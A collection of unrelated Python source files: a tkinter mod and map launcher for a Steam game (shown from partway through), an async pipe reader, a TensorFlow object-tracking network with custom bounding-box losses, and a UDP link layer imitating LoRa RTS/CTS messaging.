steampath= re.sub('(steamapps).*', '', steampath)
steampath=steampath+"Steam.exe"
subprocess.Popen([steampath,"steam://rungameid/8930//%5Cdx11"])
sema.release()
root.destroy()
def SetAsset(name,type):
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
data[type] = name
if type == 'mod':
p = "\\Assets\\DLC\\"
q = "mods\\"
if type == 'map':
p = "\\Assets\\Maps\\"
q = "maps\\"
with open("resources.json", "r") as jsonFile:
d = json.load(jsonFile)
for mod in d[type+"s"]:
if name == mod["name"]:
name = mod["folderName"]
dpath= data["path"] + p + name
if not os.path.exists(dpath):
def callback3():
if type == 'mod':
md.configure(state="disabled")
if type == 'map':
mp.config(state="disabled")
sema.acquire()
statusText.set("Modding...Please wait..")
disableLaunch()
shutil.copytree(q+name, dpath)
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
sema.release()
if (sema.acquire(blocking=False)):
enableLaunch()
if type == 'mod':
md.configure(state="active")
if type == 'map':
mp.configure(state="active")
statusText.set("Ready.")
sema.release()
t3 = threading.Thread(target=callback3)
t3.start()
def rmAsset(type):
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
if data[type] != "":
with open("resources.json", "r") as jsonFile:
d = json.load(jsonFile)
for mod in d[type + "s"]:
if data[type] == mod["name"]:
name = mod["folderName"]
modp=data["path"] + "\\Assets\\DLC\\" + name + "\\"
mapp=data["path"] + "\\Assets\\Maps\\" + name + "\\"
def callback4():
sema.acquire()
disableLaunch()
statusText.set("Removing...Please wait..")
if type == 'mod':
if os.path.exists(modp):
shutil.rmtree(modp)
if type == 'map':
if os.path.exists(mapp):
shutil.rmtree(mapp)
data[type] = ""
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
sema.release()
if (sema.acquire(blocking=False)):
enableLaunch()
statusText.set("Ready.")
sema.release()
t4 = threading.Thread(target=callback4)
t4.start()
#refact mod_select
def mod_select(name):
data = json.load(open("state.json"))
if name != None:
if data["mod"] == "":
print(name)
SetAsset(name,"mod")
variable1.set(name)
else:
if data["mod"] != name and sema.acquire(blocking=False):
rmAsset("mod")
SetAsset(name,"mod")
variable1.set(name)
sema.release()
else:
variable1.set("MODs")
def map_select(name):
data = json.load(open("state.json"))
if name != None:
if data["map"] == "":
SetAsset(name,"map")
variable2.set(name)
else:
if data["map"] != name and sema.acquire(blocking=False):
rmAsset("map")
SetAsset(name,"map")
variable2.set(name)
sema.release()
else:
variable2.set("MAPs")
def removeAll():
rmAsset("mod")
variable1.set("MODs")
rmAsset("map")
variable2.set("MAPs")
def enableLaunch():
LaunchButt.configure(state="active", image=LaunchIcon_en )
def disableLaunch():
LaunchButt.configure(state="disabled")
def muteselection():
with open("state.json", "r") as jsonFile:
data = json.load(jsonFile)
if checkCmd.get() == 1:
pygame.mixer.music.pause()
print("music off.")
data["music"] = "off"
if checkCmd.get() == 0:
pygame.mixer.music.unpause()
print("music on.")
data["music"] = "on"
with open("state.json", "w") as jsonFile:
json.dump(data, jsonFile)
def on_enter(event):
if sema.acquire(blocking=False):
statusText.set("Launch..")
sema.release()
def on_leave(event):
if sema.acquire(blocking=False):
statusText.set("Ready.")
sema.release()
# ********* Main **********
#music
pygame.init()
pygame.mixer.music.load("baba.mp3")
pygame.mixer.music.play(-1)
ver="0.18.0503"
install_path = ""
fname=""
sema = threading.BoundedSemaphore(value=2)
sema2 = threading.BoundedSemaphore(value=1)
root = Tk()
root.iconbitmap(r'launcher_favicon.ico')
root.geometry("%dx%d+%d+%d" % (300, 300, 250, 350))
root.attributes("-alpha", 0.9)
root.configure(bg="#10397c")
root.resizable(width=False, height=False)
window = myWindow(root)
window.pack(side=LEFT)
statusText = StringVar()
statusText.set("Ready.")
lock = StringVar()
lock.set("false")
# ********** Main Menu **********
menu = Menu(root)
root.config(menu=menu)
subMenu = Menu(menu)
menu.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Add Mod pack...", command=dl_mod)
subMenu.add_command(label="Add Map pack...", command=dl_map)
subMenu.add_separator()
subMenu.add_command(label="Exit",command=root.destroy)
viewMenu = Menu(menu)
menu.add_cascade(label="View", menu=viewMenu)
viewMenu.add_command(label="View Logs", command=doesnothing)
viewMenu.add_command(label="About...", command=aboutpage)
# ****** Toolbar ********
toolbar = Frame(root, bg="#10397c")
RemoveButt = Button(toolbar, text="Remove All", command=removeAll)
RemoveButt.pack(side=LEFT, padx=2, pady=2)
#AddModButt = Button(toolbar, text=" + Mod ", command=dl_mod)
#AddModButt.pack(side=LEFT, padx=2, pady=2)
#AddMapButt = Button(toolbar, text=" + Map ", command=dl_map)
#AddMapButt.pack(side=LEFT, padx=2, pady=2)
toolbar.pack(side=TOP, fill=X)
checkCmd = IntVar()
with open("state.json", "r") as jsonFile:
statedata = json.load(jsonFile)
if statedata["music"] == "on":
checkCmd.set(0)
if statedata["music"] == "off":
checkCmd.set(1)
muteselection()
mute= Checkbutton(toolbar, text="Mute", variable=checkCmd, command=muteselection)
mute.pack(side=RIGHT)
# ***** Statusbar *******
status = Label(root, textvariable=statusText, bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
f1= Frame(root, bg="#10397c")
f1.pack(side=TOP, pady=20)
f2= Frame(root, bg="#10397c")
f2.pack(side=TOP, pady=10)
f3= Frame(root, bg="#10397c")
f3.pack(side=BOTTOM)
#load resources
variable1 = StringVar(f1)
variable2 = StringVar(f2)
mod_dropdown=[]
data = json.load(open("resources.json"))
for mod in data["mods"]:
mod_dropdown.append(mod["name"])
with open("state.json", "r") as jsonFile:
statedata = json.load(jsonFile)
setMenu("mod")
if mod_dropdown != []:
md = OptionMenu(f1, variable1, *mod_dropdown, command=mod_select)
else:
md = OptionMenu(f1, variable1, None, command=mod_select)
md.pack(side=LEFT, padx=25)
map_dropdown=[]
data = json.load(open("resources.json"))
for map in data["maps"]:
map_dropdown.append(map["name"])
setMenu("map")
if map_dropdown != []:
mp = OptionMenu(f2, variable2, *map_dropdown, command=map_select)
else:
mp = OptionMenu(f2, variable2, None, command=map_select)
mp.pack(side=LEFT, padx=25)
LaunchButt = Button(f3, text="Launch", command=LaunchCiv)
#LaunchIcon= PhotoImage(file="defiance_logo.png")
LaunchIcon_en= PhotoImage(file="launch3.png")
LaunchButt.config(image=LaunchIcon_en,height=82,width=82)
LaunchButt["bg"] = "white"
LaunchButt[ "border" ] = "3"
LaunchButt.pack(side=LEFT,pady=10)
LaunchButt.bind("<Enter>", on_enter)
LaunchButt.bind("<Leave>", on_leave)
init_resources()
root.mainloop()
|
async_file_reader.py
|
import os, sys, threading
from queue import Queue
from collections import deque
from time import sleep, time
if sys.platform.startswith('linux'):
def set_nonblocking(fd):
import fcntl
flag = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flag | os.O_NONBLOCK)
else:
def set_nonblocking(fd):
import msvcrt
from ctypes import windll, byref, wintypes, WinError, POINTER
from ctypes.wintypes import HANDLE, DWORD, BOOL
PIPE_NOWAIT = DWORD(0x00000001)
def pipe_no_wait(pipefd):
SetNamedPipeHandleState = windll.kernel32.SetNamedPipeHandleState
SetNamedPipeHandleState.argtypes = [HANDLE, POINTER(DWORD), POINTER(DWORD), POINTER(DWORD)]
SetNamedPipeHandleState.restype = BOOL
h = msvcrt.get_osfhandle(pipefd)
res = windll.kernel32.SetNamedPipeHandleState(h, byref(PIPE_NOWAIT), None, None)
if res == 0:
print(WinError())
return False
return True
return pipe_no_wait(fd)
class AsyncFileReader:
def __init__(self, f):
self.f = f
self.queue = Queue()
self.thread = threading.Thread(target=self._read_thread)
self.keep_polling = True
self.thread.daemon = True
self.thread.start()
def _read_thread(self):
blocking = True
if sys.platform.startswith('linux'):
set_nonblocking(self.f.fileno())
blocking = False
try:
f = self.f
while self.keep_polling and not f.closed:
while not f.closed:
line = f.readline()
if not line: break
self.queue.put( ( time(), line ) )
if not blocking:
sleep(0.015)
except:
return
def available(self):
return not self.queue.empty()
def readline(self):
if self.available():
return self.queue.get()[1]
return ''
def get(self):
if self.available():
return self.queue.get()
return None
def print(self):
while self.available():
print(self.readline(), flush=True, end='')
def stop(self):
self.keep_polling = False
self.thread.join()
# self.print()
class AsyncConsoleReader:
def __init__(self, stdout, stderr):
self.out = AsyncFileReader(stdout)
self.err = AsyncFileReader(stderr)
self.current_out = None
self.current_err = None
def available(self):
return (self.current_out and self.current_err) or self.out.available() or self.err.available()
def _peek_out(self):
if self.current_out: return self.current_out
self.current_out = self.out.get()
return self.current_out
def _peek_err(self):
if self.current_err: return self.current_err
self.current_err = self.err.get()
return self.current_err
def stop(self):
self.out.stop()
self.err.stop()
def read(self):
out = self._peek_out()
err = self._peek_err()
if out and (not err or out[0] <= err[0]):
self.current_out = None
return (out[1], None)
if err and (not out or err[0] <= out[0]):
self.current_err = None
return (None, err[1])
return (None, None)
|
net.py
|
import tensorflow as tf
import numpy as np
import cv2
from threading import Thread
#import ipdb
#-------------------------------------------------------------------------------
def smooth_l1_loss(x):
square_loss = 0.5*x**2
absolute_loss = tf.abs(x)
return tf.where(tf.less(absolute_loss, 1.), square_loss, absolute_loss-0.5)
def _activation_summary(x):
"""Helper to create summaries for activations.
Creates a summary that provides a histogram of activations.
Creates a summary that measure the sparsity of activations.
Args:
x: Tensor
Returns:
nothing
"""
# Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
# session. This helps the clarity of presentation on tensorboard.
tensor_name = x.op.name
# tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)
tf.summary.histogram(tensor_name + '/activations', x)
tf.summary.scalar(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
def _variable_summaries(var):
"""Attach a lot of summaries to a Tensor."""
if not tf.get_variable_scope().reuse:
name = var.op.name
#logging.debug("Creating Summary for: %s" % name)
with tf.name_scope('summaries'):
tf.summary.scalar(name, var)
#mean = tf.reduce_mean(var)
#tf.summary.scalar(name + '/mean', mean)
#with tf.name_scope('stddev'):
# stddev = tf.sqrt(tf.reduce_sum(tf.square(var - mean)))
#tf.summary.scalar(name + '/sttdev', stddev)
#tf.summary.scalar(name + '/max', tf.reduce_max(var))
#tf.summary.scalar(name + '/min', tf.reduce_min(var))
tf.summary.histogram(name, var)
#-------------------------------------------------------------------------------
class TRACKNET:
def __init__(self, batch_size, wd = 0.000005, bd = 0.0000005, train = True):
self.batch_size = batch_size
self.wreg = tf.contrib.layers.l2_regularizer(wd)
self.breg = tf.contrib.layers.l2_regularizer(bd)
self.train = train
self.build()
#-----------------------------------------------------------------------
# Building the net
#-----------------------------------------------------------------------
def build(self):
self.target = tf.placeholder(tf.float32, [self.batch_size, 100, 100, 3])
self.mid = tf.placeholder(tf.float32, [self.batch_size, 400, 400, 3])
self.search = tf.placeholder(tf.float32, [self.batch_size, 400, 400, 3])
self.bboxMid= tf.placeholder(tf.float32, [self.batch_size, 5])
self.bbox= tf.placeholder(tf.float32, [self.batch_size, 4])
def resUnit(inData, outChannel, kerSize, layerName):
info = tf.layers.conv2d(inData, outChannel, kerSize, 1, name=layerName+'_info', reuse=False, activation=tf.nn.elu, padding='same', kernel_regularizer=self.wreg, bias_regularizer=self.breg)
_activation_summary(info)
strid = tf.layers.conv2d(info, outChannel*2, kerSize, 2, name=layerName+'_strid', reuse=False, activation=tf.nn.elu, padding='same', kernel_regularizer=self.wreg, bias_regularizer=self.breg)
_activation_summary(strid)
redu = tf.layers.conv2d(strid, outChannel, 1, 1, name=layerName+'_redu', reuse=False, activation=tf.nn.elu, padding='same', kernel_regularizer=self.wreg, bias_regularizer=self.breg)
_activation_summary(redu)
if 'ResUnit1' in layerName:
info = tf.image.resize_images(info, redu.shape[1:3])
outData = tf.concat([redu, info], axis=-1)
else:
inData = tf.image.resize_images(inData, redu.shape[1:3])
inData = tf.layers.conv2d(inData, outChannel, 1, 1, name=layerName+'_skip_redu', reuse=False, activation=tf.nn.elu, padding='same', kernel_regularizer=self.wreg, bias_regularizer=self.breg)
outData = tf.concat([redu, inData], axis=-1)
return outData
########### for target ###########
with tf.variable_scope("net_target"):
x = self.target
x = resUnit(x, 16, 3, 'targetResUnit1')
x = resUnit(x, 32, 3, 'targetResUnit2')
x = resUnit(x, 64, 3, 'targetResUnit3')
self.targetF = x
self.conv_output_target_up = resUnit(x, 32, 3, 'targetResUnit3_up')
x = resUnit(x,128, 3, 'targetResUnit4')
x = resUnit(x, 64, 3, 'targetResUnit5')
self.conv_output_target = x
_activation_summary(self.conv_output_target)
########### for mid ###########
with tf.variable_scope("net_mid"):
x = self.mid
x = resUnit(x, 16, 3, 'midResUnit1')
x = resUnit(x, 32, 3, 'midResUnit2')
x = resUnit(x, 64, 3, 'midResUnit3')
self.midF = x
x = resUnit(x,128, 3, 'midResUnit4')
x = resUnit(x,256, 3, 'midResUnit5')
self.conv_output_mid_up = resUnit(x, 32, 3, 'midResUnit6_up')
x = resUnit(x,128, 3, 'midResUnit6')
x = resUnit(x, 64, 3, 'midResUnit7')
self.conv_output_mid = x
_activation_summary(self.conv_output_mid)
########### for search ###########
with tf.variable_scope("net_search"):
x = self.search
x = resUnit(x, 16, 3, 'searchResUnit1')
x = resUnit(x, 32, 3, 'searchResUnit2')
x = resUnit(x, 64, 3, 'searchResUnit3')
self.searchF = x
x = resUnit(x,128, 3, 'searchResUnit4')
x = resUnit(x,256, 3, 'searchResUnit5')
self.conv_output_search_up = resUnit(x, 32, 3, 'searchResUnit6_up')
x = resUnit(x,128, 3, 'searchResUnit6')
x = resUnit(x, 64, 3, 'searchResUnit7')
self.conv_output_search = x
_activation_summary(self.conv_output_search)
########### Concatnate all nets ###########
########### fully connencted layers ###########
with tf.variable_scope("fc_nets"):
# now three features maps, each 3 x 3 x 128 + three upper features maps, each 6 x 6 x 64
concatLow = tf.concat([self.conv_output_target, self.conv_output_mid, self.conv_output_search], axis = 3)
concatUp = tf.concat([self.conv_output_target_up, self.conv_output_mid_up, self.conv_output_search_up], axis = 3)
flatLow = tf.layers.flatten(concatLow)
flatUp = tf.layers.flatten(concatUp)
x = tf.concat([flatLow, flatUp], axis = -1)
x = tf.layers.dense(x, 4096, name='fc1', activation=tf.nn.elu, kernel_regularizer=self.wreg , bias_regularizer=self.breg)
_activation_summary(x)
x = tf.layers.dense(x, 2048, name='fc2', activation=tf.nn.elu, kernel_regularizer=self.wreg , bias_regularizer=self.breg)
_activation_summary(x)
self.fc_output = tf.layers.dense(x, 8, name='fc_out', activation=None, kernel_regularizer=self.wreg , bias_regularizer=self.breg)
self.result = {
'bbox_mid': self.fc_output[:,:4],
'bbox_search': self.fc_output[:,4:]
}
#-----------------------------------------------------------------------
# Compute loss
#-----------------------------------------------------------------------
with tf.variable_scope("loss"):
fc_output_mid = self.fc_output[:,:4]
fc_output_search = self.fc_output[:,4:]
bboxGT = self.bbox
pmMidBB = self.bboxMid
## Calculate mid predicted BB distance from search GT BB and penalize if above threshold - 40% the image size
midBBDistFromGT = tf.subtract(bboxGT, fc_output_mid)
midBBDistFromGT = tf.abs(midBBDistFromGT)
midBBDistFromGT = tf.where(tf.greater(midBBDistFromGT, 0.3), midBBDistFromGT, tf.zeros(midBBDistFromGT.shape, dtype=tf.float32))
midBBDistFromGT = tf.reduce_sum(midBBDistFromGT, axis=1)
self.midBBoxGTLoss = tf.reduce_mean(midBBDistFromGT, name="midBBoxGTLoss")
_variable_summaries(self.midBBoxGTLoss)
## Bound the predicted box dimensions
widthBoxMid = tf.abs(fc_output_mid[:,2] - fc_output_mid[:,0])
heightBoxMid = tf.abs(fc_output_mid[:,3] - fc_output_mid[:,1])
searchWidth = tf.abs(bboxGT[:,2] - bboxGT[:,0])
searchHeight = tf.abs(bboxGT[:,3] - bboxGT[:,1])
widthDiff = tf.abs(widthBoxMid - searchWidth)
heightDiff = tf.abs(heightBoxMid - searchHeight)
widthDiffLoss = tf.where(tf.greater(widthDiff, 0.1), widthDiff, tf.zeros(widthDiff.shape, dtype=tf.float32))
heightDiffLoss = tf.where(tf.greater(heightDiff, 0.1), heightDiff, tf.zeros(heightDiff.shape, dtype=tf.float32))
diffLoss = tf.add(widthDiffLoss, heightDiffLoss)
self.diffLoss = tf.reduce_mean(diffLoss, name="diffLoss")
_variable_summaries(self.diffLoss)
## Calculate bounding box regression loss for the mid patch
# First, filter the invalid bounding boxes
bbCordSum = tf.reduce_sum(pmMidBB[:,:4], axis=1)
validMask = tf.tile(tf.reshape(tf.logical_and(tf.greater(bbCordSum, 0.01), tf.greater(pmMidBB[:,4],0.75)), [self.batch_size,1]), [1,4])
pmMidBB = tf.reshape(tf.boolean_mask(pmMidBB[:,:4], validMask), [-1,4])
fc_output_mid = tf.reshape(tf.boolean_mask(fc_output_mid, validMask), [-1,4])
self.checks = pmMidBB
# Now, calculate the L1 loss
bboxDistMid = tf.subtract(pmMidBB, fc_output_mid)
bboxDistMid = tf.abs(bboxDistMid)
bboxDistMid = tf.reduce_sum(bboxDistMid, axis=1)
bboxLossMid = tf.reduce_mean(bboxDistMid, name="bboxLossMid")
self.bboxLossMid = tf.where(tf.is_nan(bboxLossMid), 0., bboxLossMid, name="bboxLossMid")
_variable_summaries(self.bboxLossMid)
## Calculate bounding box regression loss
bboxDist = tf.subtract(bboxGT, fc_output_search)
bboxDist = tf.abs(bboxDist)
bboxDist = tf.reduce_sum(bboxDist, axis=1)
self.bboxLoss = tf.reduce_mean(bboxDist, name="bboxLoss")
_variable_summaries(self.bboxLoss)
self.loss = self.bboxLoss + self.bboxLossMid + 2*self.midBBoxGTLoss + 2*self.diffLoss
self.losses = {
'bboxLoss': self.bboxLoss,
'bboxLossMid': self.bboxLossMid,
'midBBoxLoss': self.midBBoxGTLoss,
'diffLoss': self.diffLoss
}
#-------------------------------------------------------------------------------
#-----------------------------------------------------------------------
# Python function to compute the best mid bounding box using PM match
#-----------------------------------------------------------------------
def pmMatchMidBB(self, inData):
#def findBestMatch(i, searchBBoxGTScaled, mid, search, targetPM, meanTarget, stdTarget, nccMax, pmMidBB):
# ## Extract search object based on GT bounding box, for the PM match
# searchPM = search[i, int(search.shape[1]*searchBBoxGTScaled[i,1]):int(search.shape[1]*searchBBoxGTScaled[i,3]),
# int(search.shape[2]*searchBBoxGTScaled[i,0]):int(search.shape[2]*searchBBoxGTScaled[i,2]), :]
# if searchPM.size == 0:
# return
# #searchPM = cv2.resize(searchPM, (targetPM.shape[2], targetPM.shape[1]))
# ## Calculate search NCC parameters for the photometric match
# meanSearch = np.mean(searchPM)
# stdSearch = np.sqrt(np.var(searchPM))
# ## Run over the mid patch to find the bounding box which yield the maximum NCC similarity
# # Initial guess - the mid BB prediction
# yMin = int(mid.shape[1]*searchBBoxGTScaled[i,1])
# yMax = int(mid.shape[1]*searchBBoxGTScaled[i,3])
# xMin = int(mid.shape[2]*searchBBoxGTScaled[i,0])
# xMax = int(mid.shape[2]*searchBBoxGTScaled[i,2])
# firstCheck = True
# foundGoodMatch = False
# for xShift in range(-32, 32, 4):
# for yShift in range(-32, 32, 4):
# for xVar in range(-2, 2, 2):
# for yVar in range(-2, 2, 2):
# if foundGoodMatch:
# return
# # Extract mid object prediction for the PM loss
# midPM = mid[i, yMin+yShift+yVar:yMax+yShift-yVar, xMin+xShift+xVar:xMax+xShift-xVar, :]
# if midPM.size == 0:
# return
# midTargetPM = cv2.resize(midPM, (targetPM.shape[2], targetPM.shape[1]))
# midSearchPM = cv2.resize(midPM, (searchPM.shape[1], searchPM.shape[0]))
# ## Calculate mid NCC parameters for the photometric match
# meanMidTargetPM = np.mean(midTargetPM)
# stdMidTargetPM = np.sqrt(np.var(midTargetPM))
# meanMidSearchPM = np.mean(midSearchPM)
# stdMidSearchPM = np.sqrt(np.var(midSearchPM))
# try:
# nccTargetMid = np.mean(((targetPM[i]-meanTarget[i])/stdTarget[i])*((midTargetPM-meanMidTargetPM)/stdMidTargetPM))
# nccMidSearch = np.mean(((searchPM-meanSearch)/stdSearch)*((midSearchPM-meanMidSearchPM)/stdMidSearchPM))
# except:
# print "Couldn't calculate NCC..."
# return
# if firstCheck:
# nccMax[i] = nccTargetMid + nccMidSearch
# pmMidBB[i] = [((xMin+xShift+xVar)/float(mid.shape[2]))-widthShift[i], ((yMin+yShift+yVar)/float(mid.shape[1]))-heightShift[i],
# ((xMax+xShift-xVar)/float(mid.shape[2]))+widthShift[i], ((yMax+yShift-yVar)/float(mid.shape[1]))+heightShift[i]]
# else:
# if nccMax[i] < nccTargetMid + nccMidSearch:
# nccMax[i] = nccTargetMid + nccMidSearch
# pmMidBB[i] = [((xMin+xShift+xVar)/float(mid.shape[2]))-widthShift[i], ((yMin+yShift+yVar)/float(mid.shape[1]))-heightShift[i],
# ((xMax+xShift-xVar)/float(mid.shape[2]))+widthShift[i], ((yMax+yShift-yVar)/float(mid.shape[1]))+heightShift[i]]
# if nccMax[i] > 1.6 or nccTargetMid > 0.9 or nccMidSearch > 0.9:
# foundGoodMatch = True
#-------------------------------------------------------------------------------
## Scaling all bounding boxes for the PM loss - target BBox is exactly the patch size --> make it 80% of the patch size, thus make the GT bounding box 80% of its size
searchBBoxGT = inData[3]
widthShift = 0.2*((searchBBoxGT[:,2]-searchBBoxGT[:,0])/2.)
heightShift = 0.2*((searchBBoxGT[:,3]-searchBBoxGT[:,1])/2.)
widthShift = np.reshape(widthShift, (-1,1))
heightShift = np.reshape(heightShift, (-1,1))
searchBBoxGTScaled = searchBBoxGT + np.concatenate((widthShift, heightShift, -widthShift, -heightShift), axis=1)
#target = inData[0]
mid = inData[1]
search = inData[2]
## Extract target object for the PM match
#targetPM = target
#targetPM = targetPM[:, targetPM.shape[1]*1/10:targetPM.shape[1]*9/10, targetPM.shape[2]*1/10:targetPM.shape[2]*9/10, :]
## Calculate target NCC parameters for the photometric match
#meanTarget = np.mean(targetPM, axis=(1,2,3))
#stdTarget = np.sqrt(np.var(targetPM, axis=(1,2,3)))
## Run over the batch and match the most similar mid bounding box to the target and search
nccMax = -2*np.ones((self.batch_size), dtype=np.float32)
pmMidBB = np.zeros((self.batch_size, 4), dtype=np.float32)
countBadSearchBB = 0
countBadMidBB = 0
#for idxOffset in range(0, self.batch_size, self.batch_size/5):
# threads = [None] * (self.batch_size/5)
# for i in range(len(threads)):
# threads[i] = Thread(target=findBestMatch, args=(i+idxOffset, searchBBoxGTScaled, mid, search, targetPM, meanTarget, stdTarget, nccMax, pmMidBB))
# threads[i].start()
# for i in range(len(threads)):
# threads[i].join()
for i in range(self.batch_size):
#print "Run on sample number: {}".format(i)
## Extract search object based on GT bounding box, for the PM match
searchPM = search[i, int(search.shape[1]*searchBBoxGTScaled[i,1]):int(search.shape[1]*searchBBoxGTScaled[i,3]),
int(search.shape[2]*searchBBoxGTScaled[i,0]):int(search.shape[2]*searchBBoxGTScaled[i,2]), :]
if searchPM.size == 0:
countBadSearchBB += 1
continue
#searchPM = cv2.resize(searchPM, (targetPM.shape[2], targetPM.shape[1]))
## Calculate search NCC parameters for the photometric match
meanSearch = np.mean(searchPM)
stdSearch = np.sqrt(np.var(searchPM))
## Run over the mid patch to find the bounding box which yield the maximum NCC similarity
# Initial guess - the mid BB prediction
yMin = int(mid.shape[1]*searchBBoxGTScaled[i,1])
yMax = int(mid.shape[1]*searchBBoxGTScaled[i,3])
xMin = int(mid.shape[2]*searchBBoxGTScaled[i,0])
xMax = int(mid.shape[2]*searchBBoxGTScaled[i,2])
firstCheck = True
foundGoodMatch = False
for xShift in range(-30, 30, 5):
for yShift in range(-30, 30, 5):
for xVar in range(-2, 2, 2):
for yVar in range(-2, 2, 2):
if foundGoodMatch:
continue
# Extract mid object prediction for the PM loss
midPM = mid[i, yMin+yShift+yVar:yMax+yShift-yVar, xMin+xShift+xVar:xMax+xShift-xVar, :]
if midPM.size == 0:
countBadMidBB += 1
continue
#midTargetPM = cv2.resize(midPM, (targetPM.shape[2], targetPM.shape[1]))
midSearchPM = cv2.resize(midPM, (searchPM.shape[1], searchPM.shape[0]))
## Calculate mid NCC parameters for the photometric match
#meanMidTargetPM = np.mean(midTargetPM)
#stdMidTargetPM = np.sqrt(np.var(midTargetPM))
meanMidSearchPM = np.mean(midSearchPM)
stdMidSearchPM = np.sqrt(np.var(midSearchPM))
try:
#nccTargetMid = np.mean(((targetPM[i]-meanTarget[i])/stdTarget[i])*((midTargetPM-meanMidTargetPM)/stdMidTargetPM))
nccMidSearch = np.mean(((searchPM-meanSearch)/stdSearch)*((midSearchPM-meanMidSearchPM)/stdMidSearchPM))
except:
print "Couldn't calculate NCC..."
continue
if firstCheck:
#nccMax[i] = nccTargetMid + nccMidSearch
nccMax[i] = nccMidSearch
pmMidBB[i] = [((xMin+xShift+xVar)/float(mid.shape[2]))-widthShift[i], ((yMin+yShift+yVar)/float(mid.shape[1]))-heightShift[i],
((xMax+xShift-xVar)/float(mid.shape[2]))+widthShift[i], ((yMax+yShift-yVar)/float(mid.shape[1]))+heightShift[i]]
else:
#if nccMax[i] < nccTargetMid + nccMidSearch:
if nccMax[i] < nccMidSearch:
#nccMax[i] = nccTargetMid + nccMidSearch
nccMax[i] = nccMidSearch
pmMidBB[i] = [((xMin+xShift+xVar)/float(mid.shape[2]))-widthShift[i], ((yMin+yShift+yVar)/float(mid.shape[1]))-heightShift[i],
((xMax+xShift-xVar)/float(mid.shape[2]))+widthShift[i], ((yMax+yShift-yVar)/float(mid.shape[1]))+heightShift[i]]
#if nccMax[i] > 1.6 or nccTargetMid > 0.9 or nccMidSearch > 0.9:
if nccMidSearch > 0.8:
foundGoodMatch = True
## return the final results
return nccMax, pmMidBB, countBadSearchBB, countBadMidBB
|
wifi_link_layer.py
|
#from gossip_layer import Gossip
import socket
import time
import os
import threading
import binascii
import select
class Wifi_Link_Layer:
def __init__(self, receive_msg_cb):
print("Initializing Link Layer...")
self.receive_msg_cb = receive_msg_cb
self.msg_buffer_list = []
self.incoming_cts_key = -1
self.wait = False #Use other name, e.g. wait_for_channel
self.wait_time = 0
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
#self.s.bind(("10.0.0.34", 5200))
self.s.bind(("192.168.0.27", 5200))
self.inputs = [self.s]
a = threading.Thread(target=self.thread_listen)
a.start()
b = threading.Thread(target=self.process_msg_pipeline)
b.start()
#_thread.start_new_thread(self.process_msg_pipeline, ())
#_thread.start_new_thread(self.thread_listen, ())
def thread_listen(self):
while True:
readable, writable, exceptional = select.select(self.inputs, [], [])
for sock in readable:
if sock == self.s:
buf = self.s.recv(250)
self.receive_msg_cb(buf)
print(buf)
def lora_cb(self, lora):
events = lora.events()
if events & LoRa.RX_PACKET_EVENT:
#msg = self.s.recv(250)
print('Link Layer: Passing received data to Network Layer')
self.receive_msg_cb(msg)
def append_msg_to_pipeline(self, msg, use_ca):
self.msg_buffer_list.append([msg, use_ca])
#Buffer Länge definieren und Nachrichten verwerfen oder auf Teilpackete aufteilen.
#Time on air -> vielfaches (zufällig) warten, falls Kanal nicht frei.
def process_msg_pipeline(self):
while True:
if (len(self.msg_buffer_list) > 0):
msg_and_ca = self.msg_buffer_list.pop(0)
msg = msg_and_ca[0]
use_ca = msg_and_ca[1]
self.lora_send_csma_ca(msg, use_ca)
time.sleep(1)
def lora_send_csma_ca(self, msg, use_ca):
if (use_ca):
print("Link Layer: using CA")
#do not send rts if wait = true
rts_random_key_b = binascii.hexlify(os.urandom(2))
rts_random_key = str(rts_random_key_b, "utf-8")
rts = "rts." + rts_random_key
while not (rts_random_key == self.incoming_cts_key): #and not wait. Probably?
#maximum repetition
if not self.wait:
self.lora_send_csma(rts)
print("Link Layer: Waiting for cts. expected: " + str(rts_random_key) + " received: " + str(self.incoming_cts_key))
else:
print("Link Layer: Waiting..." + str(self.wait_time))
#change delay randomly/exponential
#Wie lange warten? cts soll nicht mit nächstem rts versuch überlagert werden?
time.sleep(2)
else:
print("Link Layer: NOT using CA")
#blocking function
self.lora_send_csma(msg)
def lora_send_csma(self, msg):
#Semtech LoRa: High sensitivity -111 to -148dBm (Datasheet: https://semtech.my.salesforce.com/sfc/p/#E0000000JelG/a/2R0000001OKs/Bs97dmPXeatnbdoJNVMIDaKDlQz8q1N_gxDcgqi7g2o)
#while not self.lora.ischannel_free(-100,100):
#max rep.
#print("Link Layer: channel not free")
print("Link Layer: channel free (CSMA). Sending data...")
self.wifi_send(msg)
def wifi_send(self, msg):
#frame = self.pack_frame("c", msg)
frame = msg
print("Link Layer | Sending data: " + str(frame))
self.s.sendto (frame , ( "192.168.0.36" , 5200 ))
def handle_incoming_cts(self, incoming_cts):
print("Link Layer: CTS received. Key=" + incoming_cts)
self.incoming_cts_key = str(incoming_cts.split(".")[1], "utf-8")
#Important: Wait also if CTS is for other lora. Use MAC adress as identifier
#Combine with incoming RTS
def handle_incoming_rts(self, incoming_rts):
incoming_rts_key = str(incoming_rts.split(".")[1], "utf-8")
print("Link Layer: RTS received. Key=" + incoming_rts_key)
#send cts. what if cts gets lost? Ignore? CSMA sending messages
#only one rts at a time. identify rts if it is repeated.
#check if rts is new. Problem: other lora did not receive cts. Important: Waiting time
if (not self.wait):
_thread.start_new_thread(self.wait_timer, (5,))
print("Link Layer: CTS other lora. Waiting for other lora...")
#save mac address of other lora and wait until packet from this lora arrived or max
cts = "cts." + incoming_rts_key
#self.lora_send_csma(cts.encode("utf-8"))
self.lora_send_csma(cts)
def wait_timer(self, wait_time):
self.wait_time = wait_time
self.wait = True
print("Wait timer")
while self.wait_time > 0:
time.sleep(1)
self.wait_time = self.wait_time - 1
print(str(self.wait_time))
self.wait = False
#This field states whether the frame is a data frame or it is used for control functions like error and flow control or link management etc.
def pack_frame(self, type, data):
#Use single bits for control and 8 bytes for MAC without delimiters. character delimiters can cause problems and need much space.
